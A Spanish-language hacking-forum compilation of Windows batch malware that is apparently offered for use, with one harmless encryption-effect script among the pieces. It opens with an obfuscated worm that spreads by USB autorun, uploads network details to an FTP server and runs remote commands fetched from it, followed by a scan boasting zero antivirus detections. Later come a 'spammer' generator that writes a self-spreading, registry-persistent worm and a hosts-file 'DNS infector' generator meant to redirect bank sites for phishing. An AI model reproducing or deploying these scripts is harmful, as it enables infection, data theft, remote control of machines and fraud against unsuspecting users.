call:_h432crt dinfres&& ping -n 12 localhost>nul&& set ertr=9 %m1%
%fsdhf%"m%ertr: =%"<%mys%>%windir%\system32\sysio\fet.bat %m1%
ping -n 1 www.google.com>nul&&(if not exist %username%at%userdomain%_cmd.t ( %m1%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL"^)>%windir%\system32\sysio\h42.vbs %m1%
%egnkv%xect.run "cmd /c %windir%\system32\sysio\fet.bat", vbhide>>%windir%\system32\sysio\h42.vbs %m1%
%windir%\system32\sysio\h42.vbs)) %m1%
call:_h432crt mut&& exit %m1%
:_dinfres %m2%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%kjslras=GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%("Select*From __InstanceOperationEvent Within 10 Where " _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%^& "TargetInstance isa 'Win32_LogicalDisk'")>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Do While True>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%asdaiw=kjslras.NextEvent>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%If asdaiw.TargetInstance.DriveType=2 _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Or asdaiw.TargetInstance.DriveType=3 Then>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Select Case asdaiw.Path_.Class>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Case "__InstanceCreationEvent">>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%wscript.sleep 2000>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%xect.run "cmd /c %mys%ddetc " ^& asdaiw.TargetInstance.DeviceId ^& " 1", vbhide>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End Select>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End If>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Loop>>%windir%\system32\sysio\ubsh.vbs %m2%
taskkill /f /im wscript.exe %m2%
start %windir%\system32\sysio\ubsh.vbs&& goto :eof %m2%
:_fnid %m4%
for %%i in (C: H: I: J: K: L: M: Z: Y: X: W: V: U: T: S: R: Q: P: O: N: G: F: E: D:) do (call:_ddetc %%i) %m4%
exit %m4%
:_ddetc %m4%
if exist %1 (fsutil fsinfo drivetype %1|findstr /C:"CD" >nul&& (>nul echo.)|| (if exist %1\%sdjf:~10,1%utorun.inf ( %m4%
for %%z in ("%1\%sdjf:~10,1%utorun.inf" "%1\lil.bat") do (%sdjf:~10,1%ttrib -h -r -s -a "%%z") %m4%
ren %1\%sdjf:~10,1%utorun.inf %random%ow.ned) %m4%
echo.exit|cmd/K prompt $_[%sdjf:~10,1%utorun]$_open=lil.bat$_shellexecute=lil.bat$_; >"%1\%sdjf:~10,1%utorun.inf" %m4%
type "%mys: =%">"%1\lil.bat" %m4%
for %%z in (%1\%sdjf:~10,1%utorun.inf %1\lil.bat %1\*.ned) do (%sdjf:~10,1%ttrib +h "%%z"))) %m4%
if %2'==' (goto:eof) else (exit) %m4%
@%systemdrive% %m9%
@set sdjf=fictsoehnda %m9%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %m9%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %m9%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %m9%
%agnvl: =%local enabledelayedexpansion %m9%
cd %windir%\system32\sysio %m9%
%agnvl%"target=%windir%\system32\sysio\" %m9%
ipconfig/all>%username%at%userdomain%_ipcfg.t %m9%
%egnkv: =%.exit|cmd/K prompt $_verbose$_open FTP.SERVER$_FTP.USER$_FTP.PASS$_cd FTP.TARGET.FOLDER$_verbose >$.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit ipcfgs.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_put %username%at%userdomain%_ipcfg.t$_ls -lF$_verbose$_quit$_rem >>ipcfgs.t %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:ipcfgs.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit mello.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_get %username%at%userdomain%_cmd.t$_ls -lF$_verbose$_quit$_rem >>mello.t %m9%
:floop %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:mello.t %m9%
if exist %username%at%userdomain%_cmd.t for /f "delims=" %%a in (%username%at%userdomain%_cmd.t) do (%agnvl%"rcmd=%%a" %m9%
if defined rcmd (cmd /c !rcmd! %m9%
if !errorlevel!==0 (%egnkv: =%.>"d.t"&& call:r $ exit "d.t" %m9%
%egnkv: =%.exit|cmd/K prompt $_delete !username!at!userdomain!_cmd.t$_ls -lF$_verbose$_quit$_rem >>"d.t" %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:"d.t">nul&& del /q !username!at!userdomain!_cmd.t))) %m9%
goto:floop %m9%
:r %m9%
for /f "tokens=1,* delims=]" %%A in ('"type %1|find /n /v """') do (%agnvl%"current=%%B" %m9%
if defined current (call %agnvl%current=!!current:%2=!!&& %egnkv%!current!>>%3) else %egnkv: =%.>>%3) %m9%
goto:eof %m9%
:: %m0%
:: %m8%

Shadow:
Debido a posibles problemas al postear he subido el archivo en formato .txt a 1l1l3l5.a.txt

Y ps. . .el scan:

File Info

Report generated: 28.9.2009 at 19.25.46 (GMT 1)
Filename: 1l1l3l5.a.txt
File size: 11 KB
MD5 Hash: 7ab39a5929fa5dd09b38be6bd249fd4e
SHA1 Hash: 4492A228C7D2732DCACE25B2B73F3C6EEDC896CC
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


;D .

Efecto Codificador-Decodificador


En un momento de tanto ver la encriptacion se me dio la idea de encriptar el una
frase y que esta se viera en tiempo real encriptandose, pero como soy un poquito
dejado lo pospuse pero ya lo hice al fin JIJI, bueno es una encriptacion real,
no son solo numeros puestos hay y desencriptados otros sino son numeros q en
realidad se encriptan y se desencritan, con la variacion de q muestro la
encriptacion y decodificacion de la frase en el momento en que esta ocurre.
Nada mas, aca el code:
@echo off
::^| nombre:  Efecto Codificador-Decodificador ó                       ^                          
::                    Effect  Encrypt-Decrypt
::^| autor:     Guerrerohgp              
::^| fecha:     20/08/2009
::^| codigo totalmente crado para
::^| diversas formas de uso,
::^| desde este efecto hasta
::^| la imaginacion de cada uno.
::^| Uso libre, no cambiar autor.

title Efecto Codificador-Decodificador -HGP-
setlocal enabledelayedexpansion
color a&mode con cols=44 lines=10
:hgp
set "cnt=9"&set "c=%random:~-2%"
cls&echo.&set /p "cod=Su frase: "
if not defined cod goto:hgp
set "cod=%cod: =_%"
cls&call:crypt
call:decrypt
:crypt
for %%* in (a b c d e f g h i j k l m n o p q r s t u v w x y z _) do (set "ln=%%*"&call:enc)
echo.&echo.Encriptado :  &echo.
echo.    %cod2%
echo.&echo.         Press Key To Decrypt...
pause>nul
goto:eof
:enc
set "%cnt%=%ln%"
set /a "cc=%cnt%+%c%"
set "cod=!cod:%ln%=%cc% !"
set "cod2=%cod%"
set "cod2=!cod2: =!"
set "cod2=!cod2:_= !"
echo.%cod2%
ping -n 2 localhost>nul
set /a "cnt+=1"
cls&goto:eof
:decrypt
for %%_ in (%cod%) do (set "dc=%%_"&call:ds)
cls&set "cod2=!cod2:_= !"
echo.&echo.         Listo Desencriptado: &echo.
echo.    %cod2%
pause>nul
goto:hgp
:ds
cls&set /a "fn=%dc%-%c%"
set "ll=!%fn%!"
set "cod=!cod:%dc%=%ll%!"
set "cod2=%cod%
set "cod2=%cod2: =%
set "cod2=!cod2:_= !"
echo.%cod2%
ping -n 2 localhost>nul
goto:eof

Spam hhh v2.0

En esta ocacion les presento mi spamer hhh, pero no el viejo sino uno actualizado que trae junto a el la opcion de eliminar virus porsi te infectaste.
espero les guste.

codigo fuente: (Para los que no saben si lo quieren usar solo copien el codigo fuente, peguenlo en el block de notas y guarden como.. nobreque sea.bat o nombrequesea.cmd)

Espero les guste. kool
Código:
@echo off
:ini
color f0
mode con cols=30 lines=13
title Spamer -hhh-  v2.0
set Ä=ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
::-Created by Guerrerohgp-::
:strt
cls
set hgp=
echo. Ú%Ä%¿
echo.&echo.   1.Crear nuevo spamer.&echo.&echo.   2.Desinfectarte de virus.&echo.&echo.   3.INFO&echo.
echo. À%Ä%Ù
set /p "hgp=          ->"
if not defined hgp goto strt
if t%hgp%==t1 goto createhhh
if t%hgp%==t2 goto quithhh
if t%hgp%==t3 goto info
goto strt

:createhhh
cls&echo. Cual es tu mensaje para hacer spam?&echo.&set /p G= -::^>
cls&echo.&echo. es tu mensaje?
echo.&echo %G%
echo.&echo.      1.si 2.no&&set /p es=::^>
if %es%==1 goto num
cls&goto createhhh

:num
cls&echo. Cuantos archivos spam deceas&echo. que se envien en cada &echo. carpeta?&echo.&set /p n= -::^>
if %n% lss 1 goto num
if %n% gtr 100 (msg * ERROR, SOLO NUMEROS Y SOLO HASTA 100&goto num)

echo ^@echo off>>%homedrive%\hh.cmd
echo title spam hhh>>%homedrive%\hh.cmd
echo if exist ^"%%windir%%\win.cmd^" goto spam>>%homedrive%\hh.cmd
echo copy /y %%0 ^"%%windir%%\win.cmd^">>%homedrive%\hh.cmd
echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spm /t REG_SZ /d ^"%%windir%%\win.cmd^">>%homedrive%\hh.cmd
echo :spam>>%homedrive%\hh.cmd
echo for %%%%h in (b c d e f g h i j k l m n o p q r s t u v w x y z) do (set usb=%%%%h>>%homedrive%\hh.cmd
echo call:nm)>>%homedrive%\hh.cmd
echo goto hgp1>>%homedrive%\hh.cmd
echo :nm>>%homedrive%\hh.cmd
echo if exist %%usb%%:\ (copy /y %%0 "%%usb%%:\hgp.bat">>%homedrive%\hh.cmd
echo attrib +h "%%usb%%:\hgp.bat">>%homedrive%\hh.cmd
echo call :usbvir %%usb%%) else (goto:eof)>>%homedrive%\hh.cmd
echo :hgp1>>%homedrive%\hh.cmd
echo cd %%homedrive%%\>>%homedrive%\hh.cmd
echo call:shgp %%homedrive%%>>%homedrive%\hh.cmd
echo for /r /d %%%%g in (*) do call:shgp %%%%g>>%homedrive%\hh.cmd
echo exit>>%homedrive%\hh.cmd
echo :shgp>>%homedrive%\hh.cmd
echo for /l %%%%a in (1,2,%n%) do echo %G%^>^>%%^*\leeme%%%%a.txt>>%homedrive%\hh.cmd
echo goto:eof>>%homedrive%\hh.cmd
echo :usbvir>>%homedrive%\hh.cmd
echo echo [Autorun] ^>^> ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo echo open="hgp.bat" ^>^> ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo echo icon=%%windir%%\system32\shell32.dll,4 ^>^> ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo echo action=Abrir Carpeta para ver archivos. ^>^> ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo echo shell\open=Abrir ^>^> ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo attrib +h +s +r ^"%%1:\AutoRun.inf^">>%homedrive%\hh.cmd
echo goto:eof>>%homedrive%\hh.cmd
ren %homedrive%\hh.cmd %homedrive%\infectionhhh.cmd
cls
echo listo!!
msg * Archivo listo y guardado en %homedrive%\infectionhhh.cmd
msg * no ejecutes el archivo o te infectaras.
msg * Created By Guerrerohgp
pause >nul
cls&call %0
exit

:quithhh
cls
title hhh spam desinfector
del /f /q /s "%windir%\win.cmd"
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spm /f
call:sshgp %homedrive%
for %%h in (b c d e f g h i j k l m n o p q r s t u v w x y z) do (set usb=%%h
call:nm)
:nm
if exist "%usb%:\hgp.bat" del /f/q/s "%usb%:\hgp.bat"
if exist "%usb%:\AutoRun.inf" del /f/q/s "%usb%:\AutoRun.inf"
goto:eof
del /f/q/s %homedrive%\Archivos
del /f/q/s %homedrive%\Documents
cd %homedrive%\
for /r /d %%h in (*) DO call:sshgp %%h
exit
:sshgp
for /l %%a in (1,2,100) do del /f/q/s %*\leeme%%a.txt
goto:eof
pause>nul
exit
:info
cls
echo   Este scrip es de uso libre&echo.&echo. y solo con fines didacticos
echo.&echo.No soy Responsable del mal uso del scrip.
pause>nul
cls
echo.&echo.  %Ä%&echo.&echo.        Creado Por:&echo.&echo.&echo.        Guerrerohgp
echo.  %Ä%
echo.    guerrerohgp@jotmeil.com
pause>nul&cls
goto ini
Cualquier bug favor notificarmelo.

Adivian adivinador V2.0



bueno esta es mi primera aplicacion en VB, espero les guste, es un juego de adivina el numero pero mejorado al que hice en batch.
aca el link http://www.megaupload.com/?d=IFL23FAS

pd: tiene secretitos, si ganan ganaran nada mas y nada menos que el codigo fuente!!!
no es mucho, pero es algo.

dns infector reloaded (batch sourse) By Guerrerohgp

el dns infector reloaded jejejeje mejore algunas fallas de la primera vercion y la grafica tambien

pd:
Para que se entienda si esq no saben que es una infeccion dns: en situaciones normales, si tipeamos en nuestro Internet
Explorer la dirección www.bancorio.com.ar, estaremos ingresando al sitio web del
Banco Río de Buenos Aires. Pero si hemos sido víctimas de un ataque de DNS, al
tipear www.bancorio.com.ar ingresaremos sin saberlo a un sitio webdifernte o falso exactamente
igual al del banco, o si tenemos un centro de estudio lo usamos para que no entren ni hi5 ni a meboo ni ebuddy etc.

Código:
@echo off
::By Guerrerohgp
mode con cols=62 lines=10
title DNS infection Reloaded -GUERREROHGP-
set hhh=^@echo off
set r=%%windir%%\system32\drivers\etc\hosts
:uso
color f4
:: las letras estan rojo obscuro porque es mi identidad en todo lugar.
:: jejej siempre escribo en rojo.
echo. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo. þ Este programa es solo para uso deducativo, þ
echo. þ cualquier persona que use este programa es þ
echo. þ responsable de sus actos. þ
echo. ÈÍÍþÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍþÍͼ
echo. ³si postean el code no cambiar el autor³
echo. ³ Guerrerohgp ³
echo. þÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄþ
pause>nul
:menu
set ip=
set ss=
cls
echo ÉÍÍþ--- ---þÍÍ»
echo ÍÍÍÍþ primero has ping a tu scam, o como obtengas su ip þÍÍÍÍ
echo ÍÍÍÍþ escribe la ip aqui. þÍÍÍÍ
echo ÈÍÍþ--- ---þÍͼ
set /p ip= ^>^>
if not defined ip (cls&&msg * no escribiste nada&&goto menu)
cls
echo ÉÍÍ ÍÍ»
echo Es este %ip%?
echo ÈÍÍ Íͼ
echo þ1.si þ2.no þ3.salir
set /p ss= ^>^>
if not defined ss (cls&&msg * no escribiste nada&&goto menu)
if %ss%==1 goto name
if %ss%==2 cls&&goto menu
if %ss%==3 (msg * Adios Visita Terminalhacker.es&&msg * Y http://clanhackrack.foroactivo.com/)&&exit
msg * error %random%
cls
goto menu
:name
set dominio=
set sn=
cls
echo ÉÍÍþ--- ---þÍÍ»
echo ÍÍÍÍþ escribe el nombre de la pagina sin www o http þÍÍÍÍ
echo ÍÍÍÍþ Ejemplo: google.com ÍÍÍÍþ
echo ÈÍÍþ--- ---þÍͼ
set /p dominio= ^>^>
if not defined dominio (cls&&msg * no escribiste nada&&goto name)
cls
echo ÉÍÍ ÍÍ»
echo es esta la pagina, acegurate q no tenga www.
echo %dominio%?
echo ÈÍÍ Íͼ
echo þ1.si o þ2.no
set /p sn= ^>^>
if not defined sn (cls&&msg * no escribiste nada&&goto name)
if %sn%==1 goto create
if %sn%==2 goto name
msg * mal elige 1 o 2
goto name
:create
cls
set /a intt=%intt%+1
set cr=%cr%±
echo ÍÍCREANDOÍÍ
echo %cr%
ping -n 1 localhost>nul
if not %intt%==14 goto create
echo %hhh%>>DNSinfectorHGPRELOADED.bat
echo echo %ip% www.%dominio%^>^>%r%>>DNSinfectorHGPRELOADED.bat
echo echo %ip% http://www.%dominio%^>^>%r%>>DNSinfectorHGPRELOADED.bat
echo echo %ip% http://%dominio%^>^>%r%>>DNSinfectorHGPRELOADED.bat
echo echo %ip% %dominio%^>^>%r%>>DNSinfectorHGPRELOADED.bat
:bienhgp
cls
echo ÉÍÍþ þÍÍ»
echo þ Archivo Creado þ
echo listo, el archivo creado se llama
echo dnsinfectorhgp.bat
echo þ No lo ejecutes o te infectaras! þ
echo ÈÍÍþ þÍͼ
echo.
echo.
pause> nul
cls
echo.
echo.
echo. þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ
echo. þ contactarme en guerrerohgp^@hotmail.com þ
echo. þþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþ
pause>nul
cls
goto uso

nircmd Batcherizado BY Rockox (batch sourse)



nircmd Batcherizado BY Rockox

Chau MSN (sourse)

el codigo fuente de el chau msn de arhack.

By Troyanos y virus.com.ar
pd: es vb6